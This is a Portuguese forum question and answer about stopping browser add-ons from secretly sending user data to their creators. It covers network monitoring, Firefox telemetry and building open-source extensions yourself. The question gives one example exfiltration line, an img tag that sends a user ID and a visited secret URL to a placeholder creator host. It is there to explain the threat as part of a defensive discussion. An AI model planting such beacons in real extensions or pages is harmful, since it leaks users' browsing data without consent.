Impedir que addons do navegador "telefonem para casa"

0

Em princípio, qualquer complemento do navegador pode me espionar coletando histórico do navegador, webmail ou outros dados confidenciais. AFAIKS, ele poderia enviar esses dados de volta ao criador usando XMLHttpRequest() ou fetch() ou manipulando o DOM, por exemplo, adicionando algo como

<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>

acionando uma solicitação HTTP para a página do criador de complementos com a possibilidade de enviar quaisquer dados que ele desejar. No entanto, nem todos os complementos precisam fazer solicitações HTTP ou manipular o DOM.

Daí a pergunta:

Existe alguma solução existente para alguns navegadores que restringe a funcionalidade JavaScript acessível a um complemento - especificamente para manipulação de DOM e solicitações HTTP?

    
por Thomas W. 01.11.2016 / 18:54

1 resposta

2

Não tenho certeza, mas dependerá do seu navegador. Você só pode usar plug-ins de código aberto, o que permitiria verificar se eles ligam para casa. Além disso, você poderia usar algo como o Wireshark para procurar por quaisquer solicitações enviadas pelo processo do navegador para um IP diferente do site que você está visitando. Além disso, se você estiver usando o Firefox, há muitos telefonemas para o Mozilla, a menos que você desative a telemetria e eu acredite em uma outra opção em about: config. Eu esqueço a outra opção, mas você pode encontrá-la aqui . Eu não tenho certeza sobre como parar um plug-in de telefonar para casa, eu acho que você poderia tentar personalizar o Firefox e de alguma forma modificar a forma como os plugins são executados para impedi-los de enviar solicitações da web. Isso tornaria a maioria dos plug-ins inúteis, porque eles geralmente precisam enviar solicitações da Web para o trabalho.

Para verificar se um complemento de código aberto não foi adulterado, você mesmo poderá compilá-lo. Este tutorial mostra como instalar o jpm que pode compilar as extensões do Firefox. Depois de instalar o jpm, execute:

jpm xpi

no diretório de origem do plugin para gerar um arquivo de extensão xpi. Em seguida, abra o xpi que deve instalá-lo. Ele provavelmente lhe dirá que não é confiável, isso porque foi compilado e não assinado ou no site do add-on da Mozilla. Isso deve funcionar para a maioria das extensões, a menos que sejam muito antigas.

    
por 01.11.2016 / 19:07